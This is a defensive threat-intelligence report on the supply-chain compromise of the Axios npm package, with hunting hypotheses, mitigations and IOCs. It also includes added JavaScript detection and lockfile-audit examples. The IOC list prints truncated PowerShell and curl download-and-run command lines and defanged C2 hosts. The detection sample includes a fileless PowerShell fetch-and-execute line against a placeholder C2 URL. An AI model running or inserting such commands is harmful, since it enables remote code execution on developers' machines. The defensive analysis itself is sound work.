
Axios NPM Package Compromised: Supply Chain Attack Hits JavaScript HTTP Client with 100M+ Weekly Downloads

The highly popular Axios npm package was compromised when an attacker hijacked a lead maintainer's account to publish malicious versions. These versions included a phantom dependency that deployed a cross-platform Remote Access Trojan (RAT) via a postinstall hook, utilizing advanced obfuscation and anti-forensic techniques to hide its presence. The attack highlights critical risks in the software supply chain, specifically regarding dependency resolution and CI/CD pipeline protections.

Sens: Immediate · Conf: high · Analyzed: 2026-03-31

Authors: Peter Girnus, Jacob Santos, Ian Kenefick

Actors: Campaign ID 6202033, @shadanai/openclaw, @qqbrowser/openclaw-qbot

Source:Trend Micro

IOCs · 6

Key Takeaways

  • The Axios npm package was compromised via a hijacked maintainer account, leading to the publication of malicious versions 1.14.1 and 0.30.4.
  • The attack utilized a phantom dependency (plain-crypto-js@4.2.1) that executed a cross-platform RAT via a postinstall hook.
  • The malware features sophisticated obfuscation and anti-forensics, deleting its own files and swapping in a clean decoy package.json after execution.
  • The attacker bypassed GitHub Actions' OIDC Trusted Publisher safeguards by manually publishing the packages using a stolen npm token.
  • Payloads are platform-specific, deploying an AppleScript daemon on macOS, a VBScript/PowerShell fileless execution chain on Windows, and a Python RAT on Linux.

Affected Systems

  • macOS, Windows, and Linux systems running Node.js/npm environments that installed axios@1.14.1 or axios@0.30.4

Attack Chain

The attack begins when a developer installs a compromised version of Axios (1.14.1 or 0.30.4), which automatically resolves and downloads a phantom dependency named plain-crypto-js. During installation, npm triggers a postinstall hook that executes an obfuscated Node.js script (setup.js). This dropper detects the host OS and deploys a platform-specific payload: an AppleScript daemon on macOS, a VBScript/PowerShell fileless execution chain on Windows, or a Python RAT on Linux. After establishing persistence and contacting the C2 server, the dropper performs anti-forensics by deleting itself and replacing the malicious package.json with a clean decoy.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: No
  • Snort/Suricata Rules: No
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No

The article does not provide specific detection rules (YARA, Sigma, etc.), but outlines behavioral indicators, file paths, and process ancestry patterns for custom detection engineering.

Detection Engineering Assessment

  • EDR Visibility: High. EDR solutions can readily monitor process ancestry (e.g., npm spawning node, curl, or powershell), file writes to suspicious locations (/tmp, %PROGRAMDATA%), and fileless execution techniques such as [scriptblock]::Create().
  • Network Visibility: Medium. Network monitoring can detect outbound connections to the C2 domain and anomalous POST bodies mimicking npm traffic, though the traffic may blend in if it is not inspected at the application layer.
  • Detection Difficulty: Moderate. While the initial vector is obfuscated and cleans up after itself, the resulting platform-specific payloads generate highly anomalous process trees that are standard detection targets.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • File Creation (Sysmon Event ID 11)
  • PowerShell Script Block Logging (Event ID 4104)
  • Network Connections (Sysmon Event ID 3)

Hunting Hypotheses

Each hypothesis is listed with its telemetry source, ATT&CK stage, and false-positive risk.

  • Look for npm or node processes spawning suspicious child processes like curl, powershell, or wscript, indicating a malicious postinstall hook. | Telemetry: Process Creation | ATT&CK Stage: Execution | FP Risk: Medium
  • Identify PowerShell execution utilizing [scriptblock]::Create() combined with Invoke-WebRequest, indicative of fileless payload loading. | Telemetry: PowerShell Script Block Logging | ATT&CK Stage: Execution | FP Risk: Low
  • Detect the creation or execution of a binary named wt.exe in the %PROGRAMDATA% directory, which is used for masquerading. | Telemetry: File Creation / Process Creation | ATT&CK Stage: Defense Evasion | FP Risk: Low
  • Monitor for the creation of executable files in /Library/Caches/ with the com.apple.act.mond naming convention on macOS. | Telemetry: File Creation | ATT&CK Stage: Persistence | FP Risk: Low
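The four hypotheses above expressed as executable detection logic over constructed Sysmon-style events; this is an added example, not code from the Trend Micro report, and the event field names (parentImage, image, commandLine, scriptBlock, targetFilename) are assumptions rather than a vendor schema.

```javascript
// Added example, not code from the Trend Micro report: applies the four hunting
// hypotheses above to constructed telemetry. Field names (parentImage, image,
// commandLine, scriptBlock, targetFilename) are assumptions, not a vendor schema.
const base = (p) => (p || "").split(/[\\/]/).pop().toLowerCase();
const NPM_PARENTS = new Set(["npm", "npm.cmd", "node", "node.exe"]);
const SUSPICIOUS_CHILDREN = new Set(["curl", "powershell", "powershell.exe", "wscript", "wscript.exe"]);

// Returns the IDs of the hypotheses an event matches (empty array = no hit).
function evaluate(ev) {
  const hits = [];
  const parent = base(ev.parentImage);
  const image = base(ev.image);
  const text = `${ev.commandLine || ""} ${ev.scriptBlock || ""}`.toLowerCase();
  const file = (ev.targetFilename || ev.image || "").replace(/\\/g, "/").toLowerCase();

  // H1: npm/node spawning curl, powershell or wscript (malicious postinstall hook)
  if (NPM_PARENTS.has(parent) && SUSPICIOUS_CHILDREN.has(image)) hits.push("H1-npm-child");
  // H2: fileless loading via [scriptblock]::Create() combined with Invoke-WebRequest
  if (text.includes("[scriptblock]::create(") && text.includes("invoke-webrequest")) hits.push("H2-fileless-ps");
  // H3: wt.exe created or executed under %PROGRAMDATA% (masquerading)
  if (file.includes("/programdata/") && base(file) === "wt.exe") hits.push("H3-wt-masquerade");
  // H4: file dropped in /Library/Caches/ using the com.apple.act.mond name (macOS persistence)
  if (file.startsWith("/library/caches/") && file.includes("com.apple.act.mond")) hits.push("H4-macos-cache");
  return hits;
}

// Constructed sample events (Sysmon-like: type 1 = process create, type 11 = file create).
const SAMPLE_EVENTS = [
  { type: 1, parentImage: "/usr/local/bin/node", image: "/usr/bin/curl", commandLine: "curl -o /tmp/ld.py" },
  { type: 1, parentImage: "C:\\Program Files\\nodejs\\node.exe",
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    commandLine: 'powershell -w h -c "& ([scriptblock]::Create((Invoke-WebRequest <C2-URL-PLACEHOLDER>).Content))"' },
  { type: 11, image: "C:\\Windows\\System32\\cmd.exe", targetFilename: "C:\\ProgramData\\wt.exe" },
  { type: 11, image: "/usr/bin/osascript", targetFilename: "/Library/Caches/com.apple.act.mond" },
  { type: 1, parentImage: "/usr/local/bin/npm", image: "/usr/local/bin/node", commandLine: "node node_modules/.bin/tsc -p ." },
  { type: 1, parentImage: "C:\\Windows\\explorer.exe",
    image: "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", commandLine: "powershell Get-Date" },
];

// Returns only the events that matched, each annotated with its hypothesis IDs.
function triage(events) {
  return events.map((ev) => ({ ...ev, hits: evaluate(ev) })).filter((ev) => ev.hits.length > 0);
}

for (const ev of triage(SAMPLE_EVENTS)) console.log(ev.hits.join(","), ev.targetFilename || ev.commandLine);
```

The two benign events (npm running a TypeScript build, an interactive PowerShell session) produce no hits, which is the false-positive boundary the table's FP Risk column is describing.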

Control Gaps

  • Lack of OIDC Trusted Publisher enforcement on npm
  • Over-reliance on automated static analysis, which missed the obfuscated dynamic require() calls
  • Execution of npm lifecycle scripts by default

Key Behavioral Indicators

  • Presence of node_modules/plain-crypto-js/
  • Process tree: npm install -> sh -c node setup.js -> curl/powershell/wscript
  • POST requests containing 'packages.npm.org/product' to non-npm domains

False Positive Assessment

  • Low

Recommendations

Immediate Mitigation

  • Pin Axios dependencies to known safe versions (1.14.0 or 0.30.3).
  • Remove plain-crypto-js from node_modules and reinstall with --ignore-scripts.
  • Block C&C domains (sfrclak.com, callnrwise.com) and IPs (142.11.206.73) at the network perimeter.

Infrastructure Hardening

  • Enforce the use of 'npm ci --ignore-scripts' in CI/CD pipelines to prevent postinstall hook execution.
  • Rotate all credentials, tokens, and secrets that were exposed in environments where the compromised package was installed.

User Protection

  • Rebuild affected developer workstations from a known-good state rather than attempting to clean the RAT in place.
  • Deploy EDR to monitor for anomalous process executions originating from Node.js or npm.

Security Awareness

  • Educate developers on the risks of caret ranges (^1.14.0) in package.json and the importance of strict dependency pinning.
  • Train maintainers on securing npm accounts and utilizing OIDC Trusted Publishers for CI/CD publishing.
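An added example (not code from the report or the Axios project) that implements the pinning, phantom-dependency and lifecycle-script checks from the Immediate Mitigation, Infrastructure Hardening and Security Awareness lists above, run against a package.json and the "packages" map of a package-lock v2/v3; the sample manifest and lockfile are constructed, while the malicious versions and the phantom dependency name come from the report.

```javascript
// Added example, not code from the report or the Axios project: audits a
// package.json and a package-lock (v2/v3 "packages" map) for the indicators and
// weak settings the recommendations above describe. Sample inputs are constructed.
const BAD_VERSIONS = { axios: new Set(["1.14.1", "0.30.4"]), "plain-crypto-js": new Set(["4.2.1"]) };
const PHANTOM = "plain-crypto-js";
const EXACT_VERSION = /^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$/;

// Flags dependency specs in package.json that are ranges (^, ~, >=, *) rather than exact pins.
function auditManifest(pkg) {
  const findings = [];
  for (const field of ["dependencies", "devDependencies"]) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      if (!EXACT_VERSION.test(spec)) findings.push(`${field}.${name}: "${spec}" is a range, pin an exact version`);
    }
  }
  return findings;
}

// Walks every installed package in the lockfile and flags known-bad versions, the phantom
// dependency at any nesting depth, and any package carrying an install lifecycle script
// (npm records this as hasInstallScript; it runs unless installs use --ignore-scripts).
function auditLockfile(lock) {
  const findings = [];
  for (const [key, meta] of Object.entries(lock.packages || {})) {
    if (key === "") continue; // root project entry, not an installed package
    const name = key.slice(key.lastIndexOf("node_modules/") + "node_modules/".length);
    if (BAD_VERSIONS[name]?.has(meta.version)) findings.push(`${key}@${meta.version}: known malicious version`);
    if (name === PHANTOM) findings.push(`${key}: phantom dependency present, remove and reinstall with --ignore-scripts`);
    if (meta.hasInstallScript) findings.push(`${key}: has install lifecycle script (runs unless --ignore-scripts)`);
  }
  return findings;
}

// Constructed sample: a project whose caret range resolved to the malicious axios release.
const SAMPLE_PKG = { dependencies: { axios: "^1.14.0", express: "4.19.2" } };
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    "": { dependencies: { axios: "^1.14.0", express: "4.19.2" } },
    "node_modules/axios": { version: "1.14.1", dependencies: { "plain-crypto-js": "4.2.1" } },
    "node_modules/axios/node_modules/plain-crypto-js": { version: "4.2.1", hasInstallScript: true },
    "node_modules/express": { version: "4.19.2" },
  },
};

const findings = [...auditManifest(SAMPLE_PKG), ...auditLockfile(SAMPLE_LOCK)];
for (const f of findings) console.log("FINDING:", f);
```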

MITRE ATT&CK Mapping

  • T1195.002 - Compromise Software Supply Chain
  • T1059.005 - Command and Scripting Interpreter: VBScript
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1059.006 - Command and Scripting Interpreter: Python
  • T1027 - Obfuscated Files or Information
  • T1036 - Masquerading
  • T1070.004 - Indicator Removal: File Deletion
  • T1082 - System Information Discovery
  • T1071.001 - Application Layer Protocol: Web Protocols
  • T1620 - Reflective Code Loading

Additional IOCs

  • IPs:
    • 142[.]11[.]206[.]73 - C&C IP
  • Domains:
    • sfrclak[.]com - Primary C&C domain
    • callnrwise[.]com - Secondary C&C domain
  • URLs:
    • hxxp://sfrclak[.]com:8000/6202033 - Primary C&C callback
    • hxxp://sfrclak[.]com:8000/6202033.ps1 - Windows PowerShell payload download
  • File Hashes:
    • fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf (SHA256) - ld.py - Linux Python RAT
    • f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd (SHA256) - system.bat - Windows fileless loader
    • ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c (SHA256) - system.bat - Windows fileless loader
    • 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101 (SHA256) - system.bat - Windows fileless loader
    • 5bb67e88846096f1f8d42a0f0350c9c46260591567612ff9af46f98d1b7571cd (SHA256) - axios@1.14.1 malicious package
    • d6f3f62fd3b9f5432f5782b62d8cfd5247d5ee71 (SHA1) - axios@0.30.4 malicious package
    • 58401c195fe0a6204b42f5f90995ece5fab74ce7c69c67a24c61a057325af668 (SHA256) - plain-crypto-js@4.2.1 malicious phantom dependency
  • File Paths:
    • %TEMP%\6202033.vbs - Windows VBScript launcher
    • %TEMP%\6202033.ps1 - Windows PowerShell payload
    • node_modules/plain-crypto-js/ - Directory indicating presence of the phantom dependency
  • Command Lines:
    • Purpose: Execute postinstall dropper script | Tools: npm, node | Stage: Execution | node setup.js
    • Purpose: Locate PowerShell executable | Tools: cmd.exe, where | Stage: Discovery | where powershell
    • Purpose: Execute fileless PowerShell payload from C2 | Tools: powershell.exe, Invoke-WebRequest | Stage: Execution | powershell -w h -c "& ([scriptblock]::Create(
    • Purpose: Download and execute Linux Python RAT | Tools: curl, nohup, python3 | Stage: Execution | curl -o /tmp/ld.py
  • Other:
    • packages.npm.org/product0 - macOS C&C POST body
    • packages.npm.org/product1 - Windows C&C POST body
    • packages.npm.org/product2 - Linux C&C POST body
    • ifstap@proton.me - Attacker email used for hijacked maintainer account
    • nrwise@proton.me - Attacker email used for decoy package publication